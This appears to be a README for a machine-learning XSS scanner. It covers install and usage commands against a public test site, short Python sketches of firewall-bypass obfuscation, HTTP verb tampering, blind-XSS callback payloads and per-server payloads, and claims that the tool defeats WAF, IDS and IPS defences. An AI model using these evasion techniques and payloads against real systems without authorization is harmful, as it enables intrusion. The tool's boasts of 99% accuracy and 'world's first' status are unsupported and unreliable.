The world's first AI-powered Cross-Site Scripting (XSS) scanner, driven by machine learning with extreme fine-tuning. It detects Reflected, Stored, DOM-based, and Blind XSS vulnerabilities in servers and applications by probing RFC-level request design, forms, and crawled pages, and applies advanced AI techniques including deep learning, reinforcement learning, Natural Language Processing (NLP), and automatic payload generation.
Created and designed by Haroon Ahmad Awan.
Save the following content as requirements.txt in the root directory of your project:
numpy
scipy
scikit-learn
pandas
tensorflow
keras
sqlalchemy
flask
beautifulsoup4
requests
lxml
python3 -m venv venv
source venv/bin/activate   # Linux/macOS
venv\Scripts\activate      # Windows
pip install -r requirements.txt
python xssscanadv.py
Includes built-in obfuscation methods that automatically check whether the firewall was successfully bypassed. Each result is recorded as training data, sharpening payload selection and detection accuracy so more vulnerabilities can be identified.
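As a rough illustration, a bypass check of this kind might generate obfuscated variants of each payload and record which ones survive the firewall. The function name and the specific techniques below are a minimal sketch, not the scanner's actual implementation:

```python
import urllib.parse

def obfuscate_variants(payload: str) -> list[str]:
    """Produce simple obfuscated variants of a payload so a bypass check
    can record which ones get past the firewall. (Illustrative techniques;
    the scanner's real obfuscation set may differ.)"""
    # Alternate character case, e.g. <ScRiPt...>, a classic filter bypass.
    mixed = "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))
    return [
        payload,                      # baseline, unmodified
        mixed,                        # mixed case
        urllib.parse.quote(payload),  # URL-encoded
        payload.replace("<", "%3C"),  # partial encoding of the tag opener only
    ]

for v in obfuscate_variants('<script>alert(1)</script>'):
    print(v)
```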
Built-in HTTP verb tampering checks for vulnerabilities using both well-known and non-standard HTTP verbs.
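A minimal sketch of verb tampering, assuming a `send` callable that wraps the tool's HTTP layer (for example `requests.request`); the verb list and helper name are illustrative, not the scanner's own:

```python
# Well-known and non-standard verbs a tamper check might try (illustrative list).
VERBS = ["GET", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PATCH", "FOOBAR"]

def tamper_verbs(url: str, payload: str, send) -> list[str]:
    """Try the payload with each verb and report verbs whose response
    reflects it. `send(verb, url, payload)` performs the request and
    returns the response body (e.g. a thin wrapper over requests.request)."""
    hits = []
    for verb in VERBS:
        try:
            body = send(verb, url, payload)
        except OSError:
            continue  # connection refused, verb rejected at transport level, etc.
        if payload in body:
            hits.append(verb)
    return hits
```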
Utilizes neural networks to predict vulnerabilities based on complex features.
Trains models on past scan results and uses them to filter and prioritize URLs for scanning.
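To filter and prioritize URLs, a model needs numeric features extracted from each URL; the feature set below is a hypothetical sketch of that step, not the scanner's actual one:

```python
from urllib.parse import urlparse, parse_qs

def url_features(url: str) -> list[int]:
    """Turn a URL into simple numeric features a classifier could score.
    (Illustrative feature set, not the scanner's real one.)"""
    parts = urlparse(url)
    query = parse_qs(parts.query)
    return [
        len(query),  # number of query parameters (injection surface)
        int(any(k.lower() in ("q", "search", "id", "page") for k in query)),
        parts.path.count("/"),  # path depth
        int(parts.path.endswith((".php", ".asp", ".aspx", ".jsp"))),
    ]

print(url_features("http://testphp.vulnweb.com/search.php?test=query"))  # → [1, 0, 1, 1]
```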
Analyzes web page content to identify forms and input fields that could be susceptible to XSS attacks.
Extracts details of forms and input fields to better target XSS injection points.
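The idea can be sketched with the standard library's html.parser; the scanner itself lists beautifulsoup4 in requirements.txt, so its real parsing differs:

```python
from html.parser import HTMLParser

class FormExtractor(HTMLParser):
    """Collect each form's action/method and its named input fields --
    a stdlib sketch of what the scanner does with BeautifulSoup."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append({"action": attrs.get("action", ""),
                               "method": attrs.get("method", "get").lower(),
                               "inputs": []})
        elif tag in ("input", "textarea", "select") and self.forms:
            name = attrs.get("name")
            if name:  # nameless fields (e.g. bare submit buttons) are not injectable
                self.forms[-1]["inputs"].append(name)

page = '<form action="/search" method="get"><input name="q"><input type="submit"></form>'
p = FormExtractor()
p.feed(page)
print(p.forms)
```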
Learns from each scanning attempt to improve payload selection and application over time.
Adjusts future payload selection based on the success of past attempts.
Generates sophisticated XSS payloads dynamically based on the structure of the web page.
Provides tailored payloads for different server types (e.g., nginx, apache, IIS).
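A minimal sketch of server-tailored payload selection; the payload templates and the keying on the Server response header are illustrative assumptions, not the scanner's real payload sets:

```python
# Hypothetical per-server payload templates (the real scanner's differ).
SERVER_PAYLOADS = {
    "nginx":  ['<script>alert("nginx")</script>'],
    "apache": ['<img src=x onerror=alert("apache")>'],
    "iis":    ['<svg onload=alert("iis")>'],
}

def payloads_for(server_header: str) -> list[str]:
    """Pick payload templates based on the Server response header
    (case-insensitive substring match); unknown servers get all templates."""
    s = (server_header or "").lower()
    for name, payloads in SERVER_PAYLOADS.items():
        if name in s:
            return payloads
    return [p for ps in SERVER_PAYLOADS.values() for p in ps]
```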
Fetches additional URLs using CommonCrawl and Wayback Machine to ensure comprehensive coverage.
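For the Wayback Machine side, URL discovery can go through the public CDX API; the helper below only builds the query string (the scanner would then fetch it over HTTP and de-duplicate the results):

```python
from urllib.parse import urlencode

def wayback_cdx_url(domain: str) -> str:
    """Build a Wayback Machine CDX query listing archived URLs for a domain.
    fl=original returns just the original URLs; collapse=urlkey removes
    duplicate captures of the same URL."""
    params = {
        "url": f"{domain}/*",
        "output": "text",
        "fl": "original",
        "collapse": "urlkey",
    }
    return "https://web.archive.org/cdx/search/cdx?" + urlencode(params)

print(wayback_cdx_url("testphp.vulnweb.com"))
```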
Focuses on URLs likely to be vulnerable based on predictive models.
Detects blind XSS vulnerabilities and can use custom endpoints to catch blind XSS in real time, feeding the results back into training for greater accuracy in future scans. Types include:
- Server-Side Blind XSS
- Client-Side Blind XSS
- HTTP verb tampering based Blind XSS
- Server Parameter Tampering for Blind XSS
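A common way to implement the custom-endpoint side is to embed a unique token per injection, so a later hit on the listener can be traced back to the exact injection attempt. The helper and the listener URL below are hypothetical:

```python
import uuid

def blind_payload(callback_base: str) -> tuple[str, str]:
    """Create a blind-XSS payload that phones home to a callback endpoint.
    `callback_base` is your own listener (e.g. an interactsh/collaborator
    URL); the unique token ties a later callback hit to this injection."""
    token = uuid.uuid4().hex
    payload = f'<script src="{callback_base}/{token}.js"></script>'
    return token, payload
```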
Identifies reflected XSS vulnerabilities and their subtypes by analyzing the immediate reflection of payloads. Types include:
- GET-Based Reflected XSS
- POST-Based Reflected XSS
- URL-Based Reflected XSS
- HTTP verb tampering based Reflected XSS
- Server Parameter Tampering for Reflected XSS
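Classifying the immediate reflection can be sketched as follows; this is a simplification, since real detection must also consider the HTML context in which the echo lands:

```python
import html

def reflection_status(body: str, payload: str) -> str:
    """Classify how a payload echoes back in the immediate response:
    'raw' (candidate vulnerability), 'encoded' (entity-escaped, likely
    safe), or 'absent' (not reflected at all)."""
    if payload in body:
        return "raw"
    if html.escape(payload) in body:
        return "encoded"
    return "absent"
```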
Detects stored XSS vulnerabilities by inspecting whether payloads are saved and executed later within the web application. Types include:
- Database Stored XSS
- File Stored XSS
- HTML Stored XSS
- HTTP verb tampering based Stored XSS
- Server Parameter Tampering for Stored XSS
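The stored checks are inherently two-phase: inject first, re-fetch later. Sketched here with `submit`/`fetch` callables standing in for the scanner's HTTP layer:

```python
def check_stored(submit, fetch, payload: str) -> bool:
    """Stored XSS check: inject the payload via `submit`, then re-request
    the page via `fetch` and see whether the payload is served back later.
    Both callables stand in for the scanner's HTTP layer."""
    submit(payload)           # phase 1: write the payload into the app
    later_body = fetch()      # phase 2: fetch the page on a later request
    return payload in later_body
```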
Logs all scan results in a SQLite database for easy access and analysis.
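A minimal sketch of such logging with Python's built-in sqlite3 module; the table and column names here are illustrative, so inspect the real .db for the actual schema:

```python
import sqlite3

# In-memory database for the sketch; the scanner writes to a .db file.
conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE IF NOT EXISTS results (
    url TEXT, payload TEXT, xss_type TEXT, success INTEGER,
    ts DATETIME DEFAULT CURRENT_TIMESTAMP)""")
# Parameterized insert -- never interpolate payloads into SQL strings.
conn.execute("INSERT INTO results (url, payload, xss_type, success) VALUES (?, ?, ?, ?)",
             ("http://testphp.vulnweb.com/search.php", "<script>alert(1)</script>",
              "reflected", 1))
hits = conn.execute("SELECT COUNT(*) FROM results WHERE success = 1").fetchone()[0]
print(hits)  # 1
```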
To review results, including success and failure ratios, go to https://inloop.github.io/sqlite-viewer/# and import the .db file once scanning has finished (intended for expert users only).
Generates detailed HTML reports summarizing the scan results and vulnerabilities found.
Utilizes multi-threading to scan multiple URLs simultaneously, improving scanning speed and efficiency.
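Since scanning is I/O-bound, threads overlap the network waits. A sketch with the standard library's concurrent.futures, where `scan_one` stands in for the per-URL scan function and `workers` mirrors the -t thread-count flag:

```python
from concurrent.futures import ThreadPoolExecutor

def scan_all(urls, scan_one, workers=100):
    """Run scan_one over many URLs concurrently. Threads suit this
    workload because each scan mostly waits on HTTP responses; results
    come back in input order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(scan_one, urls))

print(scan_all(["a", "b", "c"], lambda u: u.upper(), workers=3))  # ['A', 'B', 'C']
```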
python xssscanadv.py -d http://testphp.vulnweb.com --crawl
python xssscanadv.py -d http://testphp.vulnweb.com --crawl --report report.html
python xssscanadv.py -l crawled_urls.txt -t 100 --duration 3600 -s --mode autounderstand --use-model --report report.html
python xssscanadv.py -d http://testphp.vulnweb.com --extractquick
python xssscanadv.py -l testphp_vulnweb_com_cleaned_urls.txt -t 100 --duration 3600 -s --mode autounderstand --use-model --report report.html
python xssscanadv.py -d http://testphp.vulnweb.com --deepcrawl
python xssscanadv.py -l found_links.txt -t 100 --duration 3600 -s --mode autounderstand --use-model --report report.html
- Auto Understand Mode initializes the Random Forest model and the Natural Language Processing (NLP) capabilities.
- This trains the model; trained models hold only the tuned features and labels (x and y, 0 and 1).
- Raw data is imported from training_data.csv.
- An NLP check then analyzes and corrects that data.
- The corrected data is correlated by the Machine Learning Auto Understand Mode for extreme fine-tuning.
- Once the software stops, congratulations! You have trained the model.
- To use the trained model, pass --use-model.
- This helps bring down WAF, IDS, IPS, and basically everything.
- Enjoy!
- High Accuracy: The accuracy remains consistently high, around 98.7% to 99.0%, throughout the training epochs. This indicates that the model is performing well on the training data.
- Low Loss: The loss values are relatively low, starting from 0.1046 and decreasing to around 0.0423 - 0.0509. Lower loss values indicate that the model's predictions are close to the actual values.
- Stability: The accuracy and loss values do not fluctuate wildly between epochs, suggesting that the model is not overfitting and is learning the patterns in the data effectively.